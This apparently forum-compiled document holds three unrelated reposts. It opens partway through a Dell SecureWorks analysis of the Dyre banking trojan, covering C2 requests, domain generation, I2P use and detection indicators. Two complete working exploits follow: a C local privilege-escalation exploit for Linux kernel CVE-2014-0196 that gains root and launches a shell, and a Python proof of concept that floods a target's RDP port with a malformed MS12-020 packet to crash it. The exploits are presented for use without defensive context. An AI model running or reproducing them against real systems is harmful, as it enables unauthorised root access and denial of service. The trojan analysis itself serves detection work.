C2 server. The requests use a standard structure, substituting appropriate values for the <Campaign ID>, <Bot ID>, and <Architecture> variables: GET /<Campaign ID>/<Bot ID>/5/cert/EXT-IP/HTTP/1.1 (Register the Bot) GET /<Campaign ID>/<Bot ID>/0/Win_XP_32bit/1023/EXT-IP/HTTP/1.1 (Register OS of Bot) GET /<Campaign ID>/<Bot ID>/1/FcJgUwyCWvgLPymGiJGwUkwCVcBMmiD/EXT-IP/(Send live signal) GET /<Campaign ID>/<Bot ID>/5/httprdc/EXT-IP/HTTP/1.1 (Ask for web fakes configuration data with target list) GET /<Campaign ID>/<Bot ID>/5/respparser/EXT-IP/HTTP/1.1 (Request dynamic web inject configuration) GET /<Campaign ID>/<Bot ID>/5/twg<Architecture>/EXT-IP/HTTP/1.1 (Request I2P plugin) GET /<Campaign ID>/<Bot ID>/5/i2p<Architecture>/EXT-IP/HTTP/1.1 (Request grabber plugin) GET /<Campaign ID>/<Bot ID>/5/n_vnc<Architecture>/EXT-IP/HTTP/1.1 (Request VNC plugin) GET /<Campaign ID>/<Bot ID>/5/n_tv<Architecture>/EXT-IP/HTTP/1.1 (Request TV plugin) GET /<Campaign ID>/<Bot ID>/5/cfg_bc/EXT-IP/HTTP/1.1 (Request Back Connect plugin) GET /<Campaign ID>/<Bot ID>/14/NAT/Port%20restricted%20NAT/0/EXT-IP/(NAT status) Figure 8 shows a Dyre request for the configuration file identifying the list of URLs to redirect to the malicious server hosting the web fake. The C2 server's reply is encrypted with a custom encryption algorithm, and the payload is digitally signed using a 1024-bit RSA key. Figure 8. Dyre's configuration request to the C2 server. (Source: Dell SecureWorks) Dyre performs a man-in-the-browser attack to steal data sent to a legitimate bank website. The malware sends the stolen data to its exfiltration server in an HTTP POST request (see Figure 9). Figure 9. Dyre HTTP POST request to exfiltration server. (Source: Dell SecureWorks) Command and control resiliency Since Dyre’s inception, it has relied upon a set of hard-coded proxy servers to communicate with its backend infrastructure. The threat actors have implemented two mechanisms to maintain control of the botnet if the proxies are unreachable: a domain generation algorithm and a plugin that integrates with an anonymization network called I2P. Domain generation algorithm Similar to other malware families, Dyre uses a domain generation algorithm (DGA) that is seeded by the current date. It generates 1,000 34-character domains per day, which are appended to one of eight country code top-level domains (ccTLDs) in Asia and the Pacific Islands: .cc, .ws, .to, .in, .hk, .cn, .tk, and .so. The following domains were generated on December 8, 2014: y3aaa48a7056d7075c3760cdbd90a75b8f.cc z376dfe4955a257a78944864dd0158d172.ws a8377c5a7c390331b15c1df94fa745e38a.to ba3be71036fc2c06d603a2b17d41ffe71a.in c9cca04cec2588918820cf33ba4337cca8.hk dec4f75e53d7202136164e2b26456dabdf.cn e3d68349d47efa0d5a9a92b1239bc4d48c.tk f85db5ce8675f53b61f00ca0e822a33312.so CTU researchers sinkholed a Dyre DGA domain to identify sources of infection and to ascertain the number of compromised systems that resorted to the DGA for command and control. During a 24-hour interval, the sinkhole received requests from 8,815 unique IP addresses. The U.S. led the number of compromised systems with 59%, followed by Canada with 8%, Portugal with 7%, the UK with 5%, and Turkey with 3% (see Figure 10). Figure 10. Infected Dyre bots reaching out to DGA domains. (Source: Dell SecureWorks) I2P The Invisible Internet Project (I2P) is an overlay network similar to Tor that offers anonymity. It provides anonymous hosting known as eepSites, which are similar to Tor's hidden services. eepSites allow users to access websites in a way that masks the true location of the server, so that it cannot be easily identified and taken down. On December 3, 2014, CTU researchers observed a Dyre sample that included the following I2P eepSite domain: nhgyzrn2p2gejk57wveao5kxa7b3nhtc4saoonjpsy65mapycaua.b32.i2p. Dyre's implementation of an I2P plugin has several tradeoffs. It makes the malware's backend server more difficult to trace, and the encapsulation of Dyre requests using I2P's encrypted protocol could complicate development of network-based signatures. However, I2P has not been widely adopted, so its presence may also be used to identify compromises. Connection to Gozi Neverquest CTU researchers have observed a relationship between the Dyre trojan and the Neverquest variant of Gozi. On several occasions, Gozi Neverquest pushed commands to download and execute a Dyre executable, and there have been other instances of Dyre issuing commands to download and execute a Gozi Neverquest executable. These examples suggest that one or more of the same threat actors are involved with both botnets, and they may leverage each trojan according to their specific needs. Conclusion Dyre has emerged from its early stages of development to become one of the most prominent banking trojans. Each iteration included refinements and new features to make it more powerful and robust. The version of Dyre being distributed as of this publication provides advanced capabilities with web fakes, dynamic web injects, a modular design, and multiple methods for maintaining command and control. The introduction of Dyre shortly after the takedown of Gameover Zeus shows the determination of threat actors targeting the financial vertical. Threat indicators The threat indicators in Table 2 can be used to detect activity related to the Dyre banking malware. The IP addresses listed in the indicators table may contain malicious content, so consider the risks before opening them in a browser. [TABLE=class: tabularr] [TR] [TH]Indicator[/TH] [TH]Type[/TH] [TH]Context[/TH] [/TR] [TR] [TD]0a77a39285d6bc816791320bb13408e5[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]c3980a6228b68f88a0718de7a0362116[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]b5b3af636f545da62f87c2773aa99016[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]ec525c578d14a15d8d913e83ec5c557b[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]32d32802a97b9c24e1eafcea6af52440[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]2d8923ef39b1fa0a091965735f3490f3[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]1a52993e4546c3d6adad037af74ce2a8[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]156f730bbb6b6cada4ef89e22ddc68ab[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]3597f17748f9bb7d008840a4b1391582[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]c6315a09e06e2ba775e5be0979d23755[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]5.79.86.19[/TD] [TD]IP address[/TD] [TD]Dyre exfiltration/web inject server[/TD] [/TR] [TR] [TD]212.56.214.154[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]202.153.35.133[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]80.248.224.75[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]109.228.17.152[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]166.78.103.85[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]109.228.17.158[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]109.228.17.155[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]176.114.0.58[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]85.25.134.53[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.172.181.164[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.172.184.75[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]213.239.209.196[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]212.56.214.130[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]37.59.2.42[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]93.190.139.178[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]85.25.138.12[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]85.25.145.179[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.172.179.9[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]203.183.172.196[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]94.23.61.172[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]94.23.196.90[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.23.8.68[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]193.203.50.17[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]193.203.50.69[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]nhgyzrn2p2gejk57wveao5kxa7b3nhtc4saoonjpsy65mapycaua.b32.i2p[/TD] [TD]I2P domain[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0[/TD] [TD]User-Agent[/TD] [TD]Dyre User-Agent[/TD] [/TR] [TR] [TD]Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36[/TD] [TD]User-Agent[/TD] [TD]Dyre User-Agent[/TD] [/TR] [TR] [TD]cd2sd48za09[/TD] [TD]Mutex[/TD] [TD]Mutex created by Dyre[/TD] [/TR] [TR] [TD]5efw48e8re54[/TD] [TD]Mutex[/TD] [TD]Mutex created by Dyre[/TD] [/TR] [/TABLE] Table 2. Threat indicators for the Dyre trojan. Sursa: Dyre Banking Trojan | Dell SecureWorks © Dell SecureWorks

CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race /* * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race * condition * * Slightly-less-than-POC privilege escalation exploit * For kernels >= v3.14-rc1 * * Matthew Daley <mattd@bugfuzz.com> * * Usage: * $ gcc cve-2014-0196-md.c -lutil -lpthread * $ ./a.out * [+] Resolving symbols * [+] Resolved commit_creds: 0xffffffff81056694 * [+] Resolved prepare_kernel_cred: 0xffffffff810568a7 * [+] Doing once-off allocations * [+] Attempting to overflow into a tty_struct............... * [+] Got it * # id * uid=0(root) gid=0(root) groups=0(root) * * WARNING: The overflow placement is still less-than-ideal; there is a 1/4 * chance that the overflow will go off the end of a slab. This does not * necessarily lead to an immediate kernel crash, but you should be prepared * for the worst (i.e. kernel oopsing in a bad state). In theory this would be * avoidable by reading /proc/slabinfo on systems where it is still available * to unprivileged users. * * Caveat: The vulnerability should be exploitable all the way from * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer * GFP_ATOMIC memory consumption") that make exploitation simpler, which this * exploit relies on. * * Thanks to Jon Oberheide for his help on exploitation technique. */ #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <pthread.h> #include <pty.h> #include <stdio.h> #include <string.h> #include <termios.h> #include <unistd.h> #define TTY_MAGIC 0x5401 #define ONEOFF_ALLOCS 200 #define RUN_ALLOCS 30 struct device; struct tty_driver; struct tty_operations; typedef struct { int counter; } atomic_t; struct kref { atomic_t refcount; }; struct tty_struct_header { int magic; struct kref kref; struct device *dev; struct tty_driver *driver; const struct tty_operations *ops; } overwrite; typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred); int master_fd, slave_fd; char buf[1024] = {0}; commit_creds_fn commit_creds; prepare_kernel_cred_fn prepare_kernel_cred; int payload(void) { commit_creds(prepare_kernel_cred(0)); return 0; } unsigned long get_symbol(char *target_name) { FILE *f; unsigned long addr; char dummy; char name[256]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) return 0; while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name); if (ret == 0) { fscanf(f, "%s\n", name); continue; } if (!strcmp(name, target_name)) { printf("[+] Resolved %s: %p\n", target_name, (void *)addr); fclose(f); return addr; } } printf("[-] Couldn't resolve \"%s\"\n", name); fclose(f); return 0; } void *overwrite_thread_fn(void *p) { write(slave_fd, buf, 511); write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1)); write(slave_fd, &overwrite, sizeof(overwrite)); } int main() { char scratch[1024] = {0}; void *tty_operations[64]; int i, temp_fd_1, temp_fd_2; for (i = 0; i < 64; ++i) tty_operations[i] = payload; overwrite.magic = TTY_MAGIC; overwrite.kref.refcount.counter = 0x1337; overwrite.dev = (struct device *)scratch; overwrite.driver = (struct tty_driver *)scratch; overwrite.ops = (struct tty_operations *)tty_operations; puts("[+] Resolving symbols"); commit_creds = (commit_creds_fn)get_symbol("commit_creds"); prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred"); if (!commit_creds || !prepare_kernel_cred) return 1; puts("[+] Doing once-off allocations"); for (i = 0; i < ONEOFF_ALLOCS; ++i) if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) { puts("[-] pty creation failed"); return 1; } printf("[+] Attempting to overflow into a tty_struct..."); fflush(stdout); for (i = 0; ; ++i) { struct termios t; int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j; pthread_t overwrite_thread; if (!(i & 0xfff)) { putchar('.'); fflush(stdout); } if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } for (j = 0; j < RUN_ALLOCS; ++j) if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } close(fds[RUN_ALLOCS / 2]); close(fds2[RUN_ALLOCS / 2]); write(slave_fd, buf, 1); tcgetattr(master_fd, &t); t.c_oflag &= ~OPOST; t.c_lflag |= ECHO; tcsetattr(master_fd, TCSANOW, &t); if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) { puts("\n[-] Overwrite thread creation failed"); return 1; } write(master_fd, "A", 1); pthread_join(overwrite_thread, NULL); for (j = 0; j < RUN_ALLOCS; ++j) { if (j == RUN_ALLOCS / 2) continue; ioctl(fds[j], 0xdeadbeef); ioctl(fds2[j], 0xdeadbeef); close(fds[j]); close(fds2[j]); } ioctl(master_fd, 0xdeadbeef); ioctl(slave_fd, 0xdeadbeef); close(master_fd); close(slave_fd); if (!setresuid(0, 0, 0)) { setresgid(0, 0, 0); puts("\n[+] Got it :)"); execl("/bin/bash", "/bin/bash", NULL); } } } Sursa: [C] CVE-2014-0196: Linux kernel 12/05/2014 - Pastebin.com

# MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org import socket import sys buf="" buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19 buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224 buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125 buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet buf+="\x30\x19\x02\x04\x00\x00\x00\x00" buf+="\x02\x04\x00\x00\x00\x02\x02\x04" buf+="\x00\x00\x00\x00\x02\x04\x00\x00" buf+="\x00\x01\x02\x04\x00\x00\x00\x00" buf+="\x02\x04\x00\x00\x00\x01\x02\x02" buf+="\xff\xff\x02\x04\x00\x00\x00\x02" buf+="\x30\x19\x02\x04\x00\x00\x00\x01" buf+="\x02\x04\x00\x00\x00\x01\x02\x04" buf+="\x00\x00\x00\x01\x02\x04\x00\x00" buf+="\x00\x01\x02\x04\x00\x00\x00\x00" buf+="\x02\x04\x00\x00\x00\x01\x02\x02" buf+="\x04\x20\x02\x04\x00\x00\x00\x02" buf+="\x30\x1c\x02\x02\xff\xff\x02\x02" buf+="\xfc\x17\x02\x02\xff\xff\x02\x04" buf+="\x00\x00\x00\x01\x02\x04\x00\x00" buf+="\x00\x00\x02\x04\x00\x00\x00\x01" buf+="\x02\x02\xff\xff\x02\x04\x00\x00" buf+="\x00\x02\x04\x82\x01\x33\x00\x05" buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00" buf+="\x08\x00\x10\x00\x01\xc0\x00\x44" buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8" buf+="\x00\x04\x00\x08\x00\x80\x02\xe0" buf+="\x01\x01\xca\x03\xaa\x09\x04\x00" buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f" buf+="\x00\x53\x00\x54\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x04\x00\x00" buf+="\x00\x00\x00\x00\x00\x0c\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x01\xca\x01\x00\x00\x00\x00" buf+="\x00\x10\x00\x07\x00\x01\x00\x30" buf+="\x00\x30\x00\x30\x00\x30\x00\x30" buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" buf+="\x00\x30\x00\x30\x00\x30\x00\x30" buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" buf+="\x00\x30\x00\x30\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c" buf+="\x00\x0d\x00\x00\x00\x00\x00\x00" buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00" buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c" buf+="\x00\x03\x00\x00\x00\x72\x64\x70" buf+="\x64\x72\x00\x00\x00\x00\x00\x80" buf+="\x80\x63\x6c\x69\x70\x72\x64\x72" buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70" buf+="\x73\x6e\x64\x00\x00\x00\x00\x00" buf+="\xc0" buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125 buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12 buf+="\x06\xd0\x00\x00\x12\x34\x00" #ITU-T Rec X.224 HOST = sys.argv[1] PORT = 3389 for i in range(1000): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) print "sending: %d bytes" % len(buf) s.send(buf) rec = s.recv(100) print "received: %d bytes" % len(rec) s.close() # BlackBap.Org Sursa: [C#] # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org i - Pastebin.com